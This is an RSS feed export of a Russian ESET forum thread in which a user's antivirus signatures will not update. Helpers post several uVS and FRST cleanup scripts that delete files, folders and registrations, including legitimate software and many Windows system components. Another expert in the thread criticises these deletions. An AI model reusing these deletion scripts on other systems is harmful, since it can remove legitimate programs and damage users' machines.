			<br />====quote====<br /><a class="blog-p-user-name" id="bp_VLDg5oHR" href="/user/997/" bx-tooltip-user-id="997">RP55 RP55</a> написал:<br />В системе было много лишнего в том числе и рекламные агенты<br />=============<br /><br />Бегло прошёлся по тексту скриптов. <B>Amigo</B> - всего лишь альтернативный интернет-браузер, <B>Mail.ru-агент</B> - безобидный интернет-мессенджер, <B>Zona</B> - торрент-клиент, <B>ACRORD32INFO.EXE</B> - модуль программы для просмотра PDF-документов от <B>Adobe</B>, <B>Adguard</B> - программа-блокировщик рекламы от известного разработчика. <B>RP55 RP55</B>, неужели, по-Вашему, все они могут блокировать обновление ESET? А вот это верх всего - <B>HASPLMS.EXE</B>, один из модулей программы защиты ключа от <B>ALADDIN Software</B>. Её использует, например, российская компания <B>АСКОН</B> в составе пакета <B>Kompas-3D</B> - мощного приложения для трёхмерного моделирования<br /><br /><br />====quote====<br /><a class="blog-p-user-name" id="bp_8ds450pp" href="/user/997/" bx-tooltip-user-id="997">RP55 RP55</a> написал:<br />для нормальной работы требовалась очистка<br />=============<br /><br />Нужно всего-то было переключить режим обновления туда-обратно. Хорошо, что система у человека осталась жива, но проблем в работе некоторых программ после такой очистки не избежать <br />
			<i>07.07.2017 18:51:44, Вячеслав Букас.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99840/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99840/</guid>
			<pubDate>Fri, 07 Jul 2017 18:51:44 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99835/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			В системе было много лишнего в том числе и рекламные агенты.<br />для нормальной работы требовалась очистка. <br />
			<i>07.07.2017 14:44:22, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99835/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99835/</guid>
			<pubDate>Fri, 07 Jul 2017 14:44:22 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99833/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			спасибо, вариант с <B>Тестовым</B> <B></B>режимом обновления решил проблему. <br />
			<i>07.07.2017 12:50:28, Дмитрий Столяров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99833/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99833/</guid>
			<pubDate>Fri, 07 Jul 2017 12:50:28 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99832/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			По правде говоря, описанный топик-стартером случай - известный баг версии <B>10.0.390</B>, о нём не раз писали на официальном форуме разработчиков. <B>Дмитрий Столяров</B>, попробуйте переключить временно режим обновления на <B>Тестовое</B> и попытайтесь обновиться. Если прошло успешно - переключайтесь на <B>Регулярное</B><br /><br />Если проблема осталась, надёжнее всего поступить так. Выполните полное удаление, как описано здесь - <noindex><a href="https://www.esetnod32.ru/support/knowledge_base/solution/?ELEMENT_ID=852896" target="_blank" rel="nofollow">https://www.esetnod32.ru/support/knowledge_base/solution/?ELEMENT_ID=852896</a></noindex><br />В зависимости от разрядности системы скачайте дистрибутив актуальной версии по ссылкам ниже:<br /><br /><noindex><a href="https://download.eset.com/com/eset/apps/home/ess/windows/latest/ess_nt64_rus.msi" target="_blank" rel="nofollow">https://download.eset.com/com/eset/apps/home/ess/windows/latest/ess_nt64_rus.msi</a></noindex><br /><noindex><a href="https://download.eset.com/com/eset/apps/home/ess/windows/latest/ess_nt32_rus.msi" target="_blank" rel="nofollow">https://download.eset.com/com/eset/apps/home/ess/windows/latest/ess_nt32_rus.msi</a></noindex><br /><br />Установите и активируйте программу <br />
			<i>07.07.2017 11:48:25, Вячеслав Букас.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99832/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99832/</guid>
			<pubDate>Fri, 07 Jul 2017 11:48:25 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99827/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			<noindex><a href="http://rgho.st/private/8THrMSZtg/94e876a7a2409d0c218e610d790b94d6" target="_blank" rel="nofollow">http://rgho.st/private/8THrMSZtg/94e876a7a2409d0c218e610d790b94d6</a></noindex><br />бесполезно....(( а переустановка может поможет? <br />
			<i>07.07.2017 00:34:11, Дмитрий Столяров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99827/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99827/</guid>
			<pubDate>Fri, 07 Jul 2017 00:34:11 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99826/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:<br />...<br />Запустите FRST и нажмите один раз на кнопку Fix и подождите. <br /><br />
====code====
<pre>&nbsp;&nbsp;

ContextMenuHandlers01: &#91;WinRAR32&#93; -&#62; {B41DB860-8EE4-11D2-9906-E49FADC173CA} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers01: &#91;XXX Groove GFS Context Menu Handler XXX&#93; -&#62; {6C467336-8281-4E60-8204-430CED96822D} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers03: &#91;XXX Groove GFS Context Menu Handler XXX&#93; -&#62; {6C467336-8281-4E60-8204-430CED96822D} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers04: &#91;XXX Groove GFS Context Menu Handler XXX&#93; -&#62; {6C467336-8281-4E60-8204-430CED96822D} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers05: &#91;XXX Groove GFS Context Menu Handler XXX&#93; -&#62; {6C467336-8281-4E60-8204-430CED96822D} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers06: &#91;WinRAR32&#93; -&#62; {B41DB860-8EE4-11D2-9906-E49FADC173CA} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers06: &#91;XXX Groove GFS Context Menu Handler XXX&#93; -&#62; {6C467336-8281-4E60-8204-430CED96822D} =&#62;&nbsp;&nbsp;-&#62; No File
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - &#92;Microsoft&#92;Windows&#92;EDP&#92;EDP App Launch Task -&#62; No File &#60;==== ATTENTION
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - &#92;Microsoft&#92;Windows&#92;EDP&#92;EDP Auth Task -&#62; No File &#60;==== ATTENTION
GroupPolicy: Restriction &#60;==== ATTENTION
GroupPolicy&#92;User: Restriction &#60;==== ATTENTION
GroupPolicyScripts: Restriction &#60;==== ATTENTION
OPR Extension: (No Name) - C:&#92;Users&#92;Дмитрий&#92;AppData&#92;Roaming&#92;Opera Software&#92;Opera Stable&#92;Extensions&#92;ahggfmgiidlaceichjfemgbaggnbaloe &#91;2017-07-05&#93;

EmptyTemp:
Reboot: 
</pre>
=============
<br />Программа FRST создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!<br />Проверяем, как работает система... <br />
			<i>06.07.2017 22:37:28, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99826/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99826/</guid>
			<pubDate>Thu, 06 Jul 2017 22:37:28 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99825/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			проблема еще осталась ((( &nbsp;вот логи<br /><noindex><a href="http://rgho.st/private/6HTCBZVBj/da9aa0d90c319cb754aba40e9b81c80d" target="_blank" rel="nofollow">http://rgho.st/private/6HTCBZVBj/da9aa0d90c319cb754aba40e9b81c80d</a></noindex><br /><noindex><a href="http://rgho.st/private/7DzXCwN27/15f6584617369457bb4f3c4ba781fe6c" target="_blank" rel="nofollow">http://rgho.st/private/7DzXCwN27/15f6584617369457bb4f3c4ba781fe6c</a></noindex><br /><noindex><a href="http://rgho.st/private/8B4cBwTfs/96054ed31cdfde37ee4c95f0cd64d443" target="_blank" rel="nofollow">http://rgho.st/private/8B4cBwTfs/96054ed31cdfde37ee4c95f0cd64d443</a></noindex> <br />
			<i>06.07.2017 22:20:14, Дмитрий Столяров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99825/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99825/</guid>
			<pubDate>Thu, 06 Jul 2017 22:20:14 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99822/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			1) В Malwarebytes - всё найденное удалите. <br />( поместите в карантин )<br /><br />2) Выполните лог в AdwCleaner<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic7084/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic7084/</a></noindex><br /><br />после завершения сканирования:<br />Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой )<br />На вкладке:<br />Папки (Folders) для Mail.Ru &nbsp;и Yandex снимите [V]<br /><br /><br />Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие<br />с автоперезагрузкой<br /><br />3) Выполните FRST: <noindex><a href="http://forum.esetnod32.ru/forum9/topic2798/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic2798/</a></noindex> <br />
			<i>06.07.2017 19:04:59, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99822/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99822/</guid>
			<pubDate>Thu, 06 Jul 2017 19:04:59 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99821/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			после выполнения скрипта и перезагрузки проблема не устранена<br />Программой Malwarebytes сделал проверку, результаты по ссылке<br /><noindex><a href="http://rgho.st/private/6vLm2fnxM/77393c68b65068d1e1bc14b8b856cf63" target="_blank" rel="nofollow">http://rgho.st/private/6vLm2fnxM/77393c68b65068d1e1bc14b8b856cf63</a></noindex> <br />
			<i>06.07.2017 18:10:59, Дмитрий Столяров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99821/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99821/</guid>
			<pubDate>Thu, 06 Jul 2017 18:10:59 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99820/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			Скопировать текст КОДА - в буфер обмена.<br />uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.<br />ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!<br />ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !<br /><br /><br />
====code====
<pre>

;uVS v4.0.5 &#91;http://dsrt.dyndns.org&#93;
;Target OS: NTv10.0
v400c
OFFSGNSAVE
delref HTTP://WWW.STARTGO123.COM/SEARCH/INDEX
delref HTTP://WWW.YOUNDOO.COM/?Z=1BAF3F7FB08168DB8CB1A45GEZBM0C5G9W7WBZ1M6Z&#38;FROM=AMZ&#38;UID=SAMSUNGXSP1654N_S0GEJ1VL900798&#38;TYPE=HP
delref HTTP://MAIL.RU/CNT/10445?GP=811009
delref HTTP://MAIL.RU/CNT/10445?GP=811036
delref HTTP://MAIL.RU/CNT/10445?GP=811560
delref HTTP://MAIL.RU/CNT/10445?GP=822313
delall %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;ROAMING&#92;CURL&#92;CURL.EXE
delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;GOOGLE&#92;CHROME&#92;USER DATA&#92;DEFAULT&#92;EXTENSIONS&#92;LPHICBBHFMLLGMOMKKHJFKPBDLNCAFBN&#92;2.1.4_0&#92;LETYSHOPS
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.EXE
del %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.COMMONS.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.FILTER.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.GLOBAL.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.IPC.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.SERVICE.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.UI.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARDSVC.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;NEWTONSOFT.JSON.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;LANGS&#92;ADGUARD.UI.RESOURCES.RU.DLL
deldir %SystemDrive%&#92;PROGRAM FILES (X86)&#92;COMMON FILES&#92;ALADDIN SHARED&#92;HASP
deltmp
restart
;---------command-block---------
delall %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;KINGOSOFT&#92;KINGO ROOT&#92;UPDATE_27205&#92;BIN&#92;KINGOSOFTSERVICE.EXE
delref %SystemRoot%&#92;SERVICEPROFILES&#92;LOCALSERVICE&#92;APPDATA&#92;LOCAL&#92;FONTCACHE&#92;FONTS&#92;CONFIG.JSON
delref {35EF4182-F900-4632-B072-8639E4478A61}&#92;&#91;CLSID&#93;
delref %SystemRoot%&#92;SYSWOW64&#92;MAPSTOASTTASK.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;MAPSUPDATETASK.DLL
delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;DESKTOP&#92;B3&#92;ШКОЛА АВТОРЕМОНТА VW PASSAT B3.B4&#92;INFO&#92;MDAC_TYP_2.8.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;COMPMGMTLAUNCHER.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;PEERDISTSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;APPVETWCLIENTRES.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;MRXSMB.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;W32TIME.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;NDIS.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;USBXHCI.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;SRV2.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;RDPCORETS.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;HTTP.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;TCPIP.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;UMPOEXT.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;DMVSC.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;IPHLPSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;CSCSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;VMBKMCL.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;SPACEPORT.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;FVEVOL.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;AFD.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;PNRPSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;PACER.SYS
delref %SystemRoot%&#92;SYSWOW64&#92;HVHOSTSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;LSM.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERS&#92;SYNTH3DVSC.SYS
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}&#92;&#91;CLSID&#93;
delref {0D012ABD-CEED-11D2-9C76-00105AA73033}&#92;&#91;CLSID&#93;
delref {166B1BCA-3F9C-11CF-8075-444553540000}&#92;&#91;CLSID&#93;
delref {233C1507-6A77-46A4-9443-F871F945D258}&#92;&#91;CLSID&#93;
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}&#92;&#91;CLSID&#93;
delref {444785F1-DE89-4295-863A-D46C3A781394}&#92;&#91;CLSID&#93;
delref {56A58823-AE99-11D5-B90B-0050DACD1F75}&#92;&#91;CLSID&#93;
delref {88D969C0-F192-11D4-A65F-0040963251E5}&#92;&#91;CLSID&#93;
delref {88D969C1-F192-11D4-A65F-0040963251E5}&#92;&#91;CLSID&#93;
delref {88D969C2-F192-11D4-A65F-0040963251E5}&#92;&#91;CLSID&#93;
delref {88D969C3-F192-11D4-A65F-0040963251E5}&#92;&#91;CLSID&#93;
delref {88D969C4-F192-11D4-A65F-0040963251E5}&#92;&#91;CLSID&#93;
delref {88D969C5-F192-11D4-A65F-0040963251E5}&#92;&#91;CLSID&#93;
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}&#92;&#91;CLSID&#93;
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}&#92;&#91;CLSID&#93;
delref {E01D1C6A-4F40-11D3-8958-00105A272DCF}&#92;&#91;CLSID&#93;
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}&#92;&#91;CLSID&#93;
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}&#92;&#91;CLSID&#93;
delref {31D09BA0-12F5-4CCE-BE8A-2923E76605DA}&#92;&#91;CLSID&#93;
delref {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF}&#92;&#91;CLSID&#93;
delref %SystemDrive%&#92;PROGRAM FILES&#92;MICROSOFT OFFICE&#92;ROOT&#92;OFFICE16&#92;MSOETWRES.DLL
delref %SystemDrive%&#92;PROGRAM FILES&#92;MICROSOFT OFFICE&#92;ROOT&#92;OFFICE16&#92;WWLIB.DLL
delref %SystemDrive%&#92;PROGRAM FILES&#92;MICROSOFT OFFICE&#92;ROOT&#92;VFS&#92;PROGRAMFILESCOMMONX64&#92;MICROSOFT SHARED&#92;OFFICE16&#92;MSO.DLL
delref HELPSVC&#92;&#91;SERVICE&#93;
delref SACSVR&#92;&#91;SERVICE&#93;
delref TBS&#92;&#91;SERVICE&#93;
delref VMMS&#92;&#91;SERVICE&#93;
delref MESSENGER&#92;&#91;SERVICE&#93;
delref %Sys32%&#92;DRIVERS&#92;RDPENCDD.SYS
delref RDSESSMGR&#92;&#91;SERVICE&#93;
delref %Sys32%&#92;DRIVERS&#92;SMARTCARDSIMULATOR.SYS
delref %Sys32%&#92;DRIVERS&#92;VIRTUALSMARTCARDREADER.SYS
delref %Sys32%&#92;DRIVERS&#92;WUDFUSBCCIDDRIVER.SYS
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.32.7&#92;PSMACHINE_64.DLL
delref %Sys32%&#92;MSMIRADISP.DLL
delref %SystemDrive%&#92;PROGRA~1&#92;COMMON~1&#92;MCAFEE&#92;UPDMGR&#92;308053~1.4&#92;MCCOREPS.DLL
delref %Sys32%&#92;TETHERINGSETTINGHANDLER.DLL
delref %Sys32%&#92;QUICKACTIONSPS.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.31.5&#92;PSMACHINE_64.DLL
delref %SystemDrive%&#92;PROGRAM FILES&#92;COMMON FILES&#92;MICROSOFT SHARED&#92;DAO&#92;DAO360.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;SPEECH_ONECORE&#92;COMMON&#92;SPEECHRUNTIME.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;TAPILUA.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;LOCATIONFRAMEWORK.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;MAPSBTSVCPROXY.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.32.7&#92;PSMACHINE.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;AUTHHOST.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;EAPPCFGUI.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;RSTRUI.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;LISTSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;AUTHHOSTPROXY.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;WBEM&#92;NLMCIM.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ISPRING&#92;FREE CAM 8&#92;CAM.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADOBE&#92;ACROBAT READER DC&#92;ACRORD32INFO.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;SMARTSCREEN.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;GPSVC.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.31.5&#92;PSMACHINE.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;IDLISTEN.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;WIFICONFIGSP.DLL
delref %SystemDrive%&#92;PROGRAM FILES&#92;COMMON FILES&#92;SYSTEM&#92;OLE DB&#92;MSDAORA.DLL
delref I:&#92;ISTUDIO.EXE
delref {424BE3CD-34AB-4F51-9C57-4341166DC8FA}&#92;&#91;CLSID&#93;
delref {611B6CB4-ACE6-4655-8D60-15FAC4AD0952}&#92;&#91;CLSID&#93;
delref {8ABE89E2-1A1E-469B-8AF0-0A111727CFA5}&#92;&#91;CLSID&#93;
delref {8AC780E1-BCDB-4816-A6EA-A88BCC064453}&#92;&#91;CLSID&#93;
delref {A0651028-BA7A-4D71-877F-12E0175A5806}&#92;&#91;CLSID&#93;
apply


</pre>
=============
<br /><br />+<br />Далее (даже если проблема решена) выполните лог программой Malwarebytes<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic10688/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic10688/</a></noindex><br /><br />Выберите вариант сканирования: Быстрое или Полное сканирование.<br />Отчет предоставить для анализа ( в своей теме на форуме ).<br />Отчёт нужно предоставить в .txt ( блокнот ) <br />
			<i>06.07.2017 17:27:39, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99820/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99820/</guid>
			<pubDate>Thu, 06 Jul 2017 17:27:39 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99819/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			скрипт выполнил<br />вот новый лог файл<br /><noindex><a href="http://rgho.st/7By7HXdDs" target="_blank" rel="nofollow">http://rgho.st/7By7HXdDs</a></noindex><br /><br />баз сигнатур все еще не обновляются <br />
			<i>06.07.2017 16:48:23, Дмитрий Столяров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99819/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99819/</guid>
			<pubDate>Thu, 06 Jul 2017 16:48:23 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99818/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			Скопировать текст КОДА - в буфер обмена.<br />uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.<br />ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!<br />ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !<br />На вопросы программы отвечаем: Да ! <br /><br />
====code====
<pre>

;uVS v4.0.5 &#91;http://dsrt.dyndns.org&#93;
;Target OS: NTv10.0
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

deldirex %SystemDrive%&#92;PROGRAM FILES (X86)&#92;MAIL.RU&#92;UPDATE SERVICE

deldirex %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;SEARCHGO

deldirex %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;SVSHOST

deldirex %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;AMIGO&#92;APPLICATION

deldirex %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ZONA

delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;MAIL.RU&#92;MAILRUUPDATER.EXE
del %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;MAIL.RU&#92;MAILRUUPDATER.EXE
delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;ROAMING&#92;MICROSOFT&#92;MSI.EXE
del %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;ROAMING&#92;MICROSOFT&#92;MSI.EXE
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DBHJHNAFPIILPFFHGLAJCAEPJBNBJEMCI%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DCCFIFBOJENKENPKMNBNNDEADPFDIFFOF%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DEPGJFMBLHACACPHALJKDCJLLKOMDCJPC%26INSTALLSOURCE%3DONDEMAND%26UC
